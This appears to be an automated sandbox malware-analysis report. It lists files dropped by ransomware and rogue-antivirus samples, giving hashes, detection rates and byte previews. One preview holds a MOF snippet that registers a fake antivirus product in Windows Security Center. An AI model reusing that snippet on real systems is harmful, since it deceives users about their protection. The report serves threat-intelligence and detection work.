                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:Non-ISO extended-ASCII text
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16
                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:I/ZYm/5V:I/Omj
                                                                                                                                                    MD5:F7D30582A6F0944B913E6D1E8D313DC4
                                                                                                                                                    SHA1:DF07EE3FA444DAF75E72CA114A520A1381F181C9
                                                                                                                                                    SHA-256:7CEF0FAC048B3DCBAD854815F81C8266F7130DC977E79ED178448AA2FB138963
                                                                                                                                                    SHA-512:56AD5DF8D798E0031E8EB9DFCF78054FABE305AC50E86691D1A056E1871458D5A102EF320B4D6CB6A0EFC317FEC3ACAD1130FA05D95FC8AC3479DF7467ACFEE6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:<...g.x......D.p
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16
                                                                                                                                                    Entropy (8bit):4.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:951Cp:9M
                                                                                                                                                    MD5:D5DC338B853389EBF8936CC5CE8B63F4
                                                                                                                                                    SHA1:0B0D5A8DB04374E26DB1EABAC0AD770CF7A885DD
                                                                                                                                                    SHA-256:56EBEC18326A4E8D411013083B73944C868CA08EA1A503D73A21BDF4D2B743B5
                                                                                                                                                    SHA-512:ADE31F3CF0AA8171DA9974BB2403D4002DDE9AC14E204695AA0B3884A8DEC15E387BC1C2C3DE6ABE9E412256EAF81A747462299B608A63E3BC832C5907C76DC2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.7.}.....("...Ho
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7232
                                                                                                                                                    Entropy (8bit):7.973077089405393
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:zNTdn4ps9bf9Ud6yxFuM+FZNwx4BTcPccgA3kVr5E9HLWmd:BBnsWbf+Iyx8WPMA3kVr5wrX
                                                                                                                                                    MD5:F3C82E653CC0B92B73DB8511F70E763E
                                                                                                                                                    SHA1:5D3CD1EDC263D2F9E9FDC4A2185625D8444BFAE2
                                                                                                                                                    SHA-256:58F6E23FF3F63EE9BBB8050AE35BD96F91888174BF4BA5186BE9CA997A513F39
                                                                                                                                                    SHA-512:6BB6851AC204C210402BEC8893F78566D6AA1CDB8B7B61D7F4FACE1E8AFF7096106640D646823D53E9CDFBEF87EFE6966F43C8DF5EE3C616DFC01E69A5654C85
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...i. _.<0...l...[...p$....5..<G.W.....!..;FL31.i..N]ER...*|.`G.{+'.:.P...==&?........9i..q..........8{.i..8..^.....I.;.@...iz.....n.n=T..S..f.....(.x.4U..x.(.dG......w..i...8....Zp.x....u..n(Y.....C?...x@..K...Z...B..ND...4.9K$p0..d...-8...m8..;.u...1{..?J...........{@?...........&..O.K.X...-.H.t?x...V..'0.YI.i.P.I/gl.7.b-..O...[./....t....b.C...K.S....Ub.....i....m.!..2.ua...P6..9=......C....t.<..W...DU..+....EUD.-.E4...-...6.$.)k..T.At`Y....7....V:..{..5....b.,0S#<y..$..9.R.-...{..@w.0..q*3..4....H......%.....e8.c.5[.+.....u?.....m.H.`.Q.Jk.i[.:...[....8.wV...V.dAv.........Z.>A.|.[...*..'.6....(T1..}.)..,->..<*,..+w..B.^.Q..4|.\z..L|.#_s..?.*..=G(..e.x../...^.fI.Cuo..d..:./......]..s)<..d.z.).g.p!......w...{6...|.S.l........~u........?E..........-..P%..k...WA..D....\....:..c..xcV.e..Y~7.a}.^..q...(..MJ...gC......n).8.O.....||P.S...x.:c...........fg..Of...3.'&r!4..f...Bk}..$...m....?,..6ZP)..U.w"...n.O.35i.`U.f..)v.........G..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):400
                                                                                                                                                    Entropy (8bit):7.416440189725468
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:DY4oKT7Qmx85c4ocXEgleYckfezHiT0mj:DY4zT2SHey34
                                                                                                                                                    MD5:0607AF6C1CBF2E5E6D873FC4D67A2F39
                                                                                                                                                    SHA1:53D3C2FDC713A7890CEF81B4DD079766AB0C5DE0
                                                                                                                                                    SHA-256:BF84156C1906189F6672CC55D3118F471614BD3B346BA67E03C0879915481B6E
                                                                                                                                                    SHA-512:D02FE92A80452CFEA9A42138E3F440C601000D5E278FA8A8C56D4B8E8FE17A6B8119896A83F940C6FE3C01917AC3561EA15575099BC0ECB90216451B62619BAA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...i. _.<0...l...[...p$....5..<G.a........l|7..0..K..../..]...2&...`..%:...\d|%.a..J..g&......9...a.6.W...q...Ji..Jav......=......"zb...{.C..@...g:...9..>.fx.).%.....<x..C>.P23.-.>.......s.&...SE...KA.....vY...Ps.a.W.?....w.T...@.G.!..P.......A..G.-...5_.W.EC.A...}..0.7..C...i~=..G.....(........<.CF.CJ.. oa..k...D.....n...t..V.g.....8..n....#.e..;..SA..`./.$.[.......l..N.v[...i.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):544
                                                                                                                                                    Entropy (8bit):7.629281426936444
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:DY4oKT7Qmx85cpsE+/wzIghWBeVFiCypZ4UAMVvi:DY4zT2UMgh1VSZ4UAuK
                                                                                                                                                    MD5:C811C8365C49C10CDCAF7960E3294C2C
                                                                                                                                                    SHA1:B16E06A44F11B2B285F7D8C202E01632E61CE3D1
                                                                                                                                                    SHA-256:8553DAECAB5682917BFB214BE09A611D354CFC8EB6D28A9363860983044E39EC
                                                                                                                                                    SHA-512:D6A189694DE68D92C83B39B48D9AFBC19EEC537518508F960601AD9D5F03C84AF1EE6045ABD82C596AA69D06DDD20D2F0EB7F8615D1360E82EDCF1FA01E86DB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...i. _.<0...l...[...p$....5..<G.a........l|7..0..K..../..]...2&...`..%:...\d|%.a..J..g&......9...a.6.W...q...Ji..Jav......=......"zb...{.C..@...g:...9..>.fx.).%.....<x.....i..."....8<..G.s.........d-..q.Q!.@3a...N.O.)..1_..r._A...A.m.eK.3,=.ly!.X....y.b..A1...K...2.3..<Z<...L.......e..As2.t......n?nH%....V..h.%..gM0 Sd.....?......K.,X...c3$Z4........EC./q.g.]..^..V.N?...q...5.A....lc.mQTi.&.....B...Qd..F/&........0..BI.X....^.......Vv.L.."l.5.@.5...W.....=.......c9.;..Z......#.%YBZq..F=o...W...2.t$. ..T.0...f..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9421312
                                                                                                                                                    Entropy (8bit):3.9863948351946825
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:98304:akMZNqXXZh/M7Y13c9FAddv2z6/HsRsUrnlBvaFOUREPaRZMF6knx82R617:k17Y13c9AvWaFOUREPaRZMF6knx8Q617
                                                                                                                                                    MD5:C18A7323332B3292A8E0F1C81DF65698
                                                                                                                                                    SHA1:BCB8F34CBE0137E888D06ACBCB6508417851A087
                                                                                                                                                    SHA-256:9C42ECA99E96A7402716FD865B57EA601FB9A18477FE2AB890BDBCD3052F68F8
                                                                                                                                                    SHA-512:4D48D11F3D0A740B9193E17782C77B01F52DD6E8324755AA81188295A0CAED0718D330453BB02CA8BC942EE5588928E57A0D89D90D6B1C32690338C5EAE8E1AD
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*.w.n...n...n...g...u...I4t.d......|...p...J...p...........l....ob.j...I4b.q...n.......k.F.....p.......p...o...p...o...p...o...Richn...........PE..L......K.................N...p~......=.......`....@..........................`.................................... 9...g......h.........v.................................................(..........@............`......(...@....................text...3M.......N.................. ..`.rdata...@...`...B...R..............@..@.data...H........T..................@....tls.........p......................@....rsrc.....v.......v.................@..@........................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):69120
                                                                                                                                                    Entropy (8bit):6.190450623836321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:S9FWW0igMY08p/41AdhEfWoh8eGf9NvvvvvvvvvvvvvvvvJQfBq:S9FxMJj3EWne290
                                                                                                                                                    MD5:4143D4973E0F5A5180E114BDD868D4D2
                                                                                                                                                    SHA1:B47FD2CF9DB0F37C04E4425085FB953CBCE81478
                                                                                                                                                    SHA-256:DA25DB24809479051D980BE5E186926DD53233A76DFE357A455387646BEFCA76
                                                                                                                                                    SHA-512:E21827712A4870461921E7996506FFE456DD2303B69DE370AA0499DDE2E4747A73D8C0E8BD7D91C5BBC414ED5EE06F36D172237489494B3DD311CCD95BA07EBC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......G...........#...8............`.............Dh.........................p................ .............................. .......0... ...................`.......................................................................................text...............................`..`.data...............................@....rdata..@...........................@..@.bss.....................................edata..............................@..@.idata....... ......................@....rsrc.... ...0..."..................@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35328
                                                                                                                                                    Entropy (8bit):6.036157311970975
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:IZw9E10THMXYyumdlZ3+aJdKE/z85TISX+RfnW:IC9E1yHMXNfdX3+TWz8WRu
                                                                                                                                                    MD5:00A71B4AFDA8033235432B1C433FECC7
                                                                                                                                                    SHA1:D7B0C218AA8FEC1C60ADA26A09D9E0D9601985CA
                                                                                                                                                    SHA-256:F9C9D2B92EFB80F6D11DF52735B8BDDD099847CC79BA56650793B21A0923B1CD
                                                                                                                                                    SHA-512:96635E66D9781AD4D2414271F6A0904CF880ED94FC19186EF4DA5F88F24E14EF1591FDC90E27DB15A6021847C592688D0034F20E2E50CA93BF8C6DB27E8C510A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.G...........#...8.\..........`........p.....o................................J......... .................................d.......x............................................................................................................text...TZ.......\..................`..`.data........p.......`..............@....rdata...............b..............@..@.bss.....................................edata...............h..............@..@.idata..d............l..............@....rsrc...x............r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):86070
                                                                                                                                                    Entropy (8bit):4.886057158141297
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:bspjN7masPcbmZOzyKGdsmkHtpwpSH3UMp4K0/06gZiH3YbcZ8ysAa23Zm:eOEEMzHtpc2l0/0JZiH3YbcZ8lh
                                                                                                                                                    MD5:0AB7D0E87F3843F8104B3670F5A9AF62
                                                                                                                                                    SHA1:10C09A12E318F0FBEBF70C4C42AD6EE31D9DF2E5
                                                                                                                                                    SHA-256:8AECAB563B3C629E8F9DCD525DC2D6B1903F6C600637E63B1EFE05E3C64D757B
                                                                                                                                                    SHA-512:E08E17167EDF461C0FCA1E8B649C0C395793E80F5400F5CBB7D7906D0C99E955FCF6BE2300DB8663D413C4B3FFB075112A6CE5BF259553C0FD3D76200EE0D375
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%.].K.].K.].K.?.X.Y.K..E._.K.].J.h.K...A.X.K..M.\.K...O.Y.K.Rich].K.................PE..L..../.E...........!.........`...............................................P......................................0........ ..P....0..P....................@.......................................................!..|............................text...z........................... ..`.rdata........... ..................@..@.data...$...........................@....idata....... ....... ..............@....rsrc...P....0.......0..............@..@.reloc..v....@.......@..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):384
                                                                                                                                                    Entropy (8bit):7.513411598408124
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:xDN+0nap53qY2RmRZrRtaKUyohUDl/YLpzoaSmv2MwIQ5Q4T5J2K9qoKdLTvK+Dt:Fap9b2gRZrRAKWu/eAmuMyh32KiLLWgL
                                                                                                                                                    MD5:4EE158EBBB979B3FE722A537B2CE68C3
                                                                                                                                                    SHA1:D975C10B9B3543B91F27B9024FDBC1A323A43F21
                                                                                                                                                    SHA-256:D213FC82554D75FDA96BEF604CCD8A08D915CDE72E73512B044B7DB7F2BE3259
                                                                                                                                                    SHA-512:3C87655C283D79F1C4BEA67E39A221D2A6E2472FE907A9798D3550F6AF453AB3E993F360AE57A3E6F7704877C7996307FB94D8400F0E1290F835F0D7D1D1BCDA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1..@..C:....I.^|.Z.....s}..%.xa.6...+...^..u/......SR5<I..mD..Z.y{}!..[.6.m.Og..U.B..9.l..Q.BW..Y]J.....pw..x......M7...p... o0......G^{;..N..H/..n.^xeD....%O6..;v55s...!..v..'1\....5..q..d`.B.G0.`..pV..K.uj..0...~...O.B.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):192
                                                                                                                                                    Entropy (8bit):6.837312109983487
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:qu+GsEC7p3r3jvoy8tRQ7HPPUl/dYBAo9WKrqfIjYQrasP07L4XWMH7jb46bqO4l:qjVpHZ8RuvP+K8yauCLEWt6OXuC
                                                                                                                                                    MD5:A2E887B99CD9D534BB5CED6A147BAEA1
                                                                                                                                                    SHA1:27125A14F127C503675B4DB9FE9B292743A7785F
                                                                                                                                                    SHA-256:57EBAAFC6C9ECAC2D90A7CDB5995EEE6E635D401262911D95CC74AE0D2F8815E
                                                                                                                                                    SHA-512:B83DA54914660365AA9EBC12EBA35222776D6EDCF72774F2932DB913FE626B06A87849AA0D88B2A07852960311B12F4ED8FB4AB19F13DBD7DF3EDC9F8FE47352
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..-6.._v....x.~MY.....'.C...!.u..8`.7L.....n,.F2<D.kxa...=..I......^.....%....M.V.....*...;.y.IN.....N...=#...Y<.+..&.+eS...vD..t...G.Vj.V..6.B.}x.v.k...V.y....BF..,.6..........$h....n.B
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):192
                                                                                                                                                    Entropy (8bit):6.815958643993331
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:qu+GsEC7p3r3jvoy8tRQ7HPPUl/dYBAo9WKrqfI2oEc1srVq0D2F9XlfemCQ5:qjVpHZ8RuvP+K8ayFCF9Xkw
                                                                                                                                                    MD5:C6F0C3270C2ADE41BBA28042F97E04E8
                                                                                                                                                    SHA1:EA43DB6A0F49260483E87F55DE3F2DE8A014BA9B
                                                                                                                                                    SHA-256:A47C69CBDE9DD549B6A4878880109F7ABA1C979FAFDE844BA8A1623037A09F68
                                                                                                                                                    SHA-512:F723BE591CA7A6E68EF17DA3C164053F23CEBE9AC45BD4B1CC8FF4E7B191394FB39DED85963B6919BF66D43C5285C668113224310853CEC7FC069A340A7B4AE2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..-6.._v....x.~MY.....'.C...!.u..8`.7L.....n,.F2<D.kxa...=..I......^.....%....M.V.....*...;.y.IN.....N...=#.O...*.e4w.<U.^.$2.-.[?..b...Y...,-3.O.......3.....}_.@U$........:..%u^..`f.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):176
                                                                                                                                                    Entropy (8bit):6.903895041871299
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:xDN9X1K0jbX7+pG64eFllt0PY3dg/n59ERvNjYGcIRjIKaKUyoXRndrxPznIn:xDN+0nap53qY2RmRZrRtaKUyohdrqn
                                                                                                                                                    MD5:208D3E854B46FF70FCCB3653DA7C13A9
                                                                                                                                                    SHA1:0B4D2FA29A8F1F36B3682FC638CD96600A27E25D
                                                                                                                                                    SHA-256:93FFD40D99DFF049EE6BC26E626F5FF38B5AAAC3AC308F28CC3C344B64C69FCF
                                                                                                                                                    SHA-512:67C2C5EA7F3925E7279952DA8BB109364CB71893AA2C6616DA9E388178E8B45A80BE3F932EEA5EB76874A55EEBD56DB7C1A255B2707C07E23CCAC498BD06C29A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1..s8....*f.....B.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):352
                                                                                                                                                    Entropy (8bit):7.452380970828987
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:xDN+0nap53qY2RmRZrRtaKUyohEAlj4K4/zixuArGvXGNVul0FTCNDmqMCulELv:Fap9b2gRZrRAKW2248jr42NrTOiCuls
                                                                                                                                                    MD5:DE9F2709A0DB259B72BFC71D4CF14A7E
                                                                                                                                                    SHA1:E505A7725B6DFF6D0394A63BFA3F2FA2C937803F
                                                                                                                                                    SHA-256:181AE526E377A182C18B9E16F880521BFC031D616E14F0415BB5373F22965F76
                                                                                                                                                    SHA-512:9669F2F2E56A86FDB087975997730E3C5338590C1B142EF5C8DABE31103BC2C936B58838BC336171934C21AFAD1EC64638A148893AE2641FEA8B51FE3C9478DB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1..w..v.*w...V ...*.<..C@.J..............]..M.UgYf.......p....d.'..`.~..<.5^..).....X...z<.q..N....T.i.6O..l........;..9O...\BO...Vu.rv..p..g%.0..W....O..8.[QYV=.K..8.^..H~.Ju<IdWW.....
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2494
                                                                                                                                                    Entropy (8bit):5.243107864940501
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cAn/TLtfGgzmQLeUp/B8HIsTVSkC9+TeNs:pTLtf9zmQ18ck8s
                                                                                                                                                    MD5:F0477B05FE858F8F8E957ECEC87A0511
                                                                                                                                                    SHA1:1BAEBED3B06FCCDBC810879111D609FB73975607
                                                                                                                                                    SHA-256:464EEB03D2602FF1A54EEB777F9A03563F4B6B613832E9A29545433647F8D2A0
                                                                                                                                                    SHA-512:4EA4C65ACDF028E574B3ACE42E4E8A7F7B7B186553ED91904BBD60944C83F8C4A13B22FE65B71137F81E77B3B7D493A3163DD45D743FC4DC6AB7A85BE5110D54
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051593686244000</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):172648
                                                                                                                                                    Entropy (8bit):7.623689262295841
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:sqp6y91BH91Be/MbNBQ3MypF06N25xOT5Ng2WV4:Oy/BH/Be00Mypk5sYp4
                                                                                                                                                    MD5:87E4959FEFEC297EBBF42DE79B5C88F6
                                                                                                                                                    SHA1:EBA50D6B266B527025CD624003799BDDA9A6BC86
                                                                                                                                                    SHA-256:4F0033E811FE2497B38F0D45DF958829D01933EBE7D331079EEFC8E38FBEAA61
                                                                                                                                                    SHA-512:232FEDEC0180E85560A226870A244A22F54CA130ED6D6DC95DC02A1FF85F17DA396925C9FF27D522067A30EE3E74A38ADFF375D8752161EE629DF14F39CF6BA9
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 60%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 52%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@z.T.................|............... ........@.. ..............................p.....@.....................................W.......P...............h...........l................................................ ............... ..H............text....z... ...|.................. ..`.rsrc...P............~..............@..@.reloc..............................@..B........................H.......hO...I......,....L..............................................6.(.....(....*...0............(.....r...p.r...p....(....-5~....r...p.o......r...pr...p(....o....r...p(....o.....r&..p(....(...., r:..pr...p(....&r...p(....&(....*.*.*.*.0..........s......o.....( ...*z.,..{....,..{....o!.....("...*...0..^............(#...s$.....s%...}.....s&...}.....s'...}.....s(...}.....s(...}.....s(...}.....s(...}.....s(...}.....s(...}.....{....o)....(*....{.....r...po+...t7...o,....{...
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:CSV text
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):847
                                                                                                                                                    Entropy (8bit):5.350326386662965
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8AoPtHTG1hAHKKPz
                                                                                                                                                    MD5:8695FFB03DE68402BA23CADD1D71EF14
                                                                                                                                                    SHA1:67BBF40D11F0B1841FEE4F622E07855787065E0B
                                                                                                                                                    SHA-256:1F0942A2EECF4990E027C7D609E319ADCF4563F984DD0D8EF2B370A1817F3C1C
                                                                                                                                                    SHA-512:6EDEEAB5EF14473DF54251D69A3E2B7AC29778AEF929F8EC05F03008BF9AD629FE315115B22EDC09E92E1D7F2869CF9D4DDC6DB92C4158E92F80DEDA5A365098
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@Antivirus.exe
                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):443
                                                                                                                                                    Entropy (8bit):5.130314528868292
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:jNpKiB8l5hNffFGWIylPZg4GKV7F0NbW7GitW74Id4YbJ:PB8vhFfk0lPS4GK9F6b/UcW2J
                                                                                                                                                    MD5:7FAD92AFDA308DCA8ACFC6FF45C80C24
                                                                                                                                                    SHA1:A7FA35E7F90F772FC943C2E940737A48B654C295
                                                                                                                                                    SHA-256:76E19416EB826A27BDCF626C3877CF7812BBE9B62CC2CCC5C2F65461D644246F
                                                                                                                                                    SHA-512:49EED1E1197401CB856064BF7FDBD9F3BC57F3C864D47F509346D44EED3B54757D8C6CDB6254990D21291065F0762D2A1588D09E43C5728F77A420F6A8DCD6EA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:// Load the MOF in Root\SecurityCenter namespace..#pragma namespace("\\\\.\\Root\\SecurityCenter")..// Create the class..// No properties are specified..// so the class will have only system properties..instance of AntiVirusProduct..{.. instanceGuid = "{28e00e3b-806e-4533-925c-f4c3d79514b9}";.. companyName = "Antivirus";.. displayName = "Antivirus";.. onAccessScanningEnabled = true;.. productUptoDate = false;.. versionNumber = "1.0";..};..
                                                                                                                                                    Process:C:\Windows\302746537.exe
                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):348
                                                                                                                                                    Entropy (8bit):4.746239451096403
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:hWcyRlRoLUX/CQrRjzHJ//1zBDRv7YUK1R7Y77hG7Y7nrn:wn7VFXfrv+7Q7gQr
                                                                                                                                                    MD5:7D8BEB22DFCFACBBC2609F88A41C1458
                                                                                                                                                    SHA1:52EC2B10489736B963D39A9F84B66BAFBF15685F
                                                                                                                                                    SHA-256:4AA9ED4B38514F117E6E4F326CB0A1BE7F7B96199E21305E2BD6DCE289D7BAA2
                                                                                                                                                    SHA-512:A26CF9168CF7450435A9FE8942445511F6FDA1087DB52BD73E335D6F5B544FC892999019D9291D9DCC60C3656DE49688F6D63282C97706E2DB286F988E44FD94
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
